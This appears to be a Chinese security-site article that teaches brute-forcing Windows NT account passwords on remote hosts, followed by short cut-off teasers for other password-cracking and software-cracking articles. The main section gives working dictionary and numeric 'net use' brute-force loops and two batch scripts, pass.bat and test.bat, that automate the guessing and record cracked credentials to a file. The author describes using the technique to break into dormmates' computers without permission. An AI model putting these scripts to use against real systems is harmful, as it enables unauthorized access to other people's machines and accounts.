用Dos命令解开远程NT服务器用户密码
所属分类:
网络安全 / 加密解密
阅读数:
103
收藏 0赞 0分享
如知道一个NT帐户与密码,就可以用
net use \\主机\ipc$Content$nbsp;"密码" /user:"用户"
与远程主机建立连接,这是每一个黑客或是梦想成为又或是正在努力成为黑客的朋友都知道的方法,甚至连我这个连菜鸟都算不上的小鸟都知道,我也仅仅知道这一条,我就用我仅仅知道的这一条在宿舍网里进入别人的电脑,因为他们的电脑密码都为空,被他们发现了之后狠K了一顿,然后纷纷加上了密码,这下可没戏了,想去偷窥他们的密码他们又防范得紧,只得想其他办法,也许各位大虾们就会利用其他方法,诸如寻找系统之类得到管理权限,而我不行,因为我前面说过,我只会那一条,那又会有人说用软件暴力破解密码就可以了,也许不错,但首先我没有那些高深的软件也没有天赋去研究那些复杂的用法,却在无意间看DOS帮助时发现了一些命令,当真是天无绝人之路:
1、字典:for /f %i in (字典文件) do net use \\主机\ipc$Content$nbsp;"%i" /user:"用户"
2、数字:for /l %i in (start,step,end) do net use \\主机\ipc$Content$nbsp;"%i" /user:"用户"
以上可参看DOS里面for帮助,还别说,真让我给连上几台机子,可问题也随之而来,连是连上了,我仍然不知道密码,下次要用还得重新全部试过。
正失望,无意间又发现了一个好方法,也许是我太笨,也许你们更聪明,,说不定你们早已经发现了,不再说废话,下面就将方法全部给出,请各位大虾指正:
将下面文件存为pass.bat:
@echo off
echo ------------------------------------------------------------------- >>c:\pass.txt
echo ------------------------------------------------------------------- >>c:\pass.txt
date /t >>c:\pass.txt
time /t >>c:\pass.txt
echo 破解结果: >>c:\pass.txt
if "%6"=="1" goto sh*t2
:sh*t1
start "正在破解" /min cmd /c for /f %%i in (%1) do call test.bat %2 "%%i" %3
goto quit
:sh*t2
start "正在破解" /min cmd /c for /l %%i in (%1,%2,%3) do call test.bat %4 "%%i" %5
:quit
将下面文件存为test.bat:
net use \\%1\ipc$Content$nbsp;%2 /user:"%3"
goto answer%ERRORLEVEL%
rem %ERRORLEVEL%表示取前一命令执行返回结果,net use成功返回0,失败返回2
:answer0
echo 远程主机:"%1" >>c:\pass.txt
echo 用 户:"%3" >>c:\pass.txt
echo 密 码:%2 >>c:\pass.txt
net use \\%1\ipc$Content$nbsp;/delet
exit
:answer2
将pass.bat与test.bat存放于system32中,用法如下:
1、如果用字典破解:pass.bat 字典文件路径及名称 主机 用户名
2、如果用数字破解:pass.bat 起始数 步长 结束数 主机 用户名 1
密码破解出来之后,存放于c:\pass.txt文件里面。
另外,我做的这些只是在局域网内测试,如果远程测试,受网速限制,具体情况只能靠自己去摸索.
详述破解技术中的暴力破解原理
不可不说一下学习破解的三个阶段:
初级,修改程序,用ultraedit等工具修改exe文件,称暴力破解,简称爆破。
中级,追出软件的注册码。
高级,写出注册机。
先说这爆破。所谓爆破,就是指通过修改可执行文件的源文件,来达到相应的目
收藏 0赞 0分享
简单不求人 轻松让你击破ATA硬盘密码
有些人利用ATA密码来保护储存在计算机硬盘中的数据,但是在大多数情况下攻击者都能轻松破译ATA密码,全面访问硬盘中的数据。
在美国,盗取个人及企业计算系统中的敏感信息已成为增长速度最快的罪行之一。据Gartner,IDC等分析机构统计,有近80%的笔记本电脑存有公司的
收藏 0赞 0分享
恢复MySQL密码笔记
因为MySQL密码存储于数据库mysql中的user表中
所以只需要将我windows 2003下的MySQL中的user表拷贝过来覆盖掉就行了
在c:mysqldatamysql(linux 则一般在/var/lib/mysql/mysql/)目录下有三个user表相关
收藏 0赞 0分享
验证码破解技术
所谓验证码,就是将一串随机产生的数字或符号,生成一幅图片,图片里加上一些干扰象素(防止OCR),由用户肉眼识别其中的验证码信息,
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码技术。
收藏 0赞 0分享
软件破解技术-注册机和补丁制作
概念介绍
何为注册机?注册机就是针对某一软件,通过一定算法算出注册码的程序。我们写注册机时,一般都要了解注册码的算法(这当然是通过跟踪调试了解的),之后用汇编语言或其它高级语言来把算法还原。这样大家可根据自己的要求输入注册码,如根据自己的姓名,
收藏 0赞 0分享
Linux系统中密码破解大全
(一)Linux 系统密码破解
1.在grub选项菜单按E进入编辑模式
2.编辑kernel那行 /init 1 (或/single)
3.按B重启
4.进入后执行下列命令
root@#passwd root (设置roo
收藏 0赞 0分享
教你在15秒内破解出cmos密码的方法
如果你只想"15秒绿色环保型"请直接看方法3:
*如果你想对cmos有个深入的了解或揪出本文理解的不足,请看方法0,1,2,3-:)
----CMOS (Award)密码简介与破解0--3法----
计算机启动时,由存放在主板
收藏 0赞 0分享
OllyDBG反汇编破解Radmin密码
Radmin 是一款很不错的服务器管理
无论是 远程桌面控制 还是 文件传输
速度都很快 很方便
这样也形成了 很多服务器都装了 radmin这样的
现在你说 4899默认端口 没密码的 服务器你上哪找?
大家都知道radmin的密码都是32位m
收藏 0赞 0分享
破解PCAnyWhere远程连接的密码
由于NT的机器一般使用PCAnyWhere进行远程管理,Win2K的机器一般使用了终端进行远程管理,因此如果能够得到PCAnyWhere远程连接的帐号和密码,那么就能远程连接到主机。
问题的关键就是要得到PCAnyWhere的密码文件(*.CIF),然后使用PCa
收藏 0赞 0分享
软件破解之“动态跟踪分析”
一、SOFTICE 配制
虽然大部分 VB 程序仍调用 Win32 API 函数,但如想在 VB dll 运行库中设断的话,你就必须把 VB dll 运行库加入 SOFTICE 配制里去。
下例是在 win95/98 下你把相关的 VB DLL 运行库加入
收藏 0赞 0分享
查看更多